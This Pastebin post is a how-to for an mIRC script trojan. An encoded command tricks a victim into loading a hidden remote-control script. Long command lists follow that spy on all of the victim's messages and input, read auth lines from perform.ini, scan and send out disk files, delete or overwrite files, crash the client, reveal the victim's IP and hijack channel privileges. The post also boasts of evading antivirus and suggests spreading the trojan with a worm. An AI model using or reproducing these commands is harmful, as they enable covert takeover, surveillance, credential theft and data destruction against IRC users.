Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1) Infect the victim
- The Trojan can be activated by the victim when he writes the next command:
- //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc |
- msg YOURNICK i love you
- YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
- the ' | msg YOURNICK I love you ' part.
- This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on
- ^*:text:ins*:?:{ . $+ $2- | haltdef }
- The haltdef will block your messages to the victim beginning with 'ins'. With this the user can’t see your commands, so he
- wont have a clue who is controlling his mIRC.
- Example:
- /msg victim ins msg #channel hi
- This will let the victim message #channel the 'hi' message, but the victim will NOT see it, all others in the channel will see.
- And the victim will not see your message 'ins msg #channel hi' because it will be blocked by 'haltdef'. Nice isn’t it? J
- When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause
- him an excess flood if he is on too much 'popular' channels (channel with much activity). For adding the spy part (it will send
- you all his activity, messages received, message sent and commands executed) execute the next commands:
- 2) Spy the victim:
- /msg victim ins write -c myscript.mrc
- /msg victim ins unload -rs myscript.mrc
- /msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
- /msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ >
- $1- }
- /msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+
- >,[COMMAND]) $1- }
- /msg victim ins load -rs myscript.mrc
- Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:
- /msg victim ins unload -rs myscript.mrc
- Note: victim = the nick of the victim who has executed that command, and who has the Trojan.
- 3) Make other remote files (.mrc)
- You can make remote files yourself and add usefull functions in it.
- /msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
- /msg victim ins .load –rs YOURSCRIPTNAMEt.mrc
- 4) Use of the Trojan:
- Well this is limited, but this is the main basic: you can make commands yourself, I’ll try to make more advanced commands
- later J
- REMOVE FILE :
- /msg victim ins remove C:\Textfile.txt
- OPEN SITE:
- /msg victim ins url www.site.com
- JOIN CHANNEL:
- /msg victim ins join #channel
- PART CHANNEL:
- /msg victim ins part #channel
- QUERY USER:
- /msg victim ins query user
- MSG USER:
- /msg victim ins msg user
- INVITE USER:
- /msg victim ins invite user #channel
- BAN USER:
- /msg victim ins ban #channel user
- KICK USER:
- /msg victim ins kick #channel user
- IGNORE USER:
- /msg victim ins ignore *!*@host.com
- UNIGNORE USER:
- /msg victim ins unignore *!*@host.com
- CHANGE NICK:
- /msg victim ins nick thenickyouwant
- OP USER:
- /msg victim ins mode #channel +o user
- VOICE USER:
- /msg victim ins mode #channel +v user
- CHANGE TOPIC:
- /msg victim ins topic #channel text
- RECEIVE FILE:
- /msg victim ins dcc send user file
- or
- /msg victim ins dcc send user C:\something.sth
- EDIT TEXT:
- /msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit
- (-l1 --> first line)
- READ A PIECE OF FILE (LIKE PERFORM):
- following commands must be executed after eachother:
- /msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
- /msg victim ins .load -rs mab
- /msg victim ins abcd123
- SEARCH HARD DISK FOR A FILE:
- /msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
- /msg victim ins .load -rs MAB1
- /msg victim ins MAB1
- LET HIS mIRC CRASH:
- /msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
- /msg victim ins .load -rs MAB2
- /msg victim ins MAB2
- SCAN HIS HARD DISK AND SAVE IT AS .txt:
- //echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
- Note: Probably you want this file, well you do this:
- /msg victim ins dcc send YOURNICK C:\M_A_B.txt
- ** Important note **
- The victim will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:
- /msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) |
- .load -rs MyNewScript.mrc
- FIND THE VICTIMs IP WHEN HE USES A MASK:
- /msg victim ins //msg YOURNICK $ip
- FIND THE VICTIMs HOST WHEN HE USES A MASK:
- /msg victim ins //msg YOURNICK $host
- FIND THE VICTIMs OS:
- /msg victim ins //msg YOURNICK $os
- FIND OUT ON WHICH SERVER THE VICTIM IS LOCATED:
- /msg victim ins //msg YOURNICK $server
- FIND OUT WHAT THE REAL TIME ON THE VICTIMs PC IS:
- /msg victim ins //msg YOURNICK $time
- FIND OUT WHAT THE REAL DATE ON THE VICTIMs PC IS:
- /msg victim ins //msg YOURNICK $date
- FIND OUT OF THE VICTIM IS AWAY
- /msg victim ins //msg YOURNICK $away
- FIND OUT THE IP OF THE SERVER THE VICTIM IS ON:
- /msg victim ins //msg YOURNICK $serverIP
- FIND OUT ON WHAT URLs THE VICTIM IS ON AT THE MOMENT:
- /msg victim ins //msg YOURNICK $url
- FIND OUT WHAT THE REAL mIRC VERSION THE VICTIM HAS:
- /msg victim ins //msg YOURNICK $victim
- TURN THE AUTO JOIN ON INVITE ON (or OFF)
- /msg victim ins ajinvite on
- LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
- /msg victim ins amsg <the message you want him to say on all channels>
- CHANGE THE VICTIMs ALTERNATIVE NICK:
- /msg victim ins anick <nickname>
- CHANGE THE VICTIMs BACKGROUND PICTURE:
- /msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
- with
- -a = active window
- -m = main mIRC window
- -s = status window
- -g = finger window
- -d = single message window
- -e = set as default
- -cfnrtp = center, fill, normal, stretch, tile, photo
- -l = toolbar
- -u = toolbar buttons
- -h = switchbar
- -x = no background picture
- LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
- /msg victim ins channel #CHANNELNAME
- Note: the victim must be on #CHANNELNAME
- CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
- /msg victim ins clearall [-snqmtgu]
- s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
- LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
- /msg victim ins clipboard <the text you want to be clipboarded>
- CLOSE THE OPEN QUERIES OF THE VICTIM:
- /msg victim ins close
- LET THE VICTIM QUIT mIRC:
- /msg victim ins quit <the quit message you want>
- LET THE VICTIM DISCONNECT FROM SERVER:
- /msg victim ins disconnect
- LET THE VICTIM CHANGE SERVER:
- /msg victim ins server the.server.you.want
- LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
- /msg victim ins server -m
- /msg victim ins server the.server.you.want
- LET THE VICTIM GIVE YOU FLAGS (if he is able to):
- /msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
- Note:
- |TheBot| = the bot who can give flags
- Chanlev = can be different, sometimes it is also, "adduser"
- flag = the flag you want
- YOURNICK = your nick
- CHANGE THE VICTIMs FONT AND FONT SIZE:
- /msg victim ins font -asgbd <fontsize> <fontname>
- CHANGE THE VICTIMs FULL NAME:
- /msg victim ins fullname <name>
- LET THE VICTIM REJOIN A CHANNEL:
- /msg victim ins hop #CHANNEL
- MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
- /msg victim ins mkdir <dirname>
- NOTE:
- victim = nick of the victim
- user = your nick
- 5) Additional Information: this trojan is NOT detectable by any virus scanner, since its a code in mIRC... And remember that
- you dont need a file to send to the victim, the victim will make (write) a file by executing that command. If you want to let it
- spread by an IRC worm, i would suggest that you used a bot...
- by NE0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement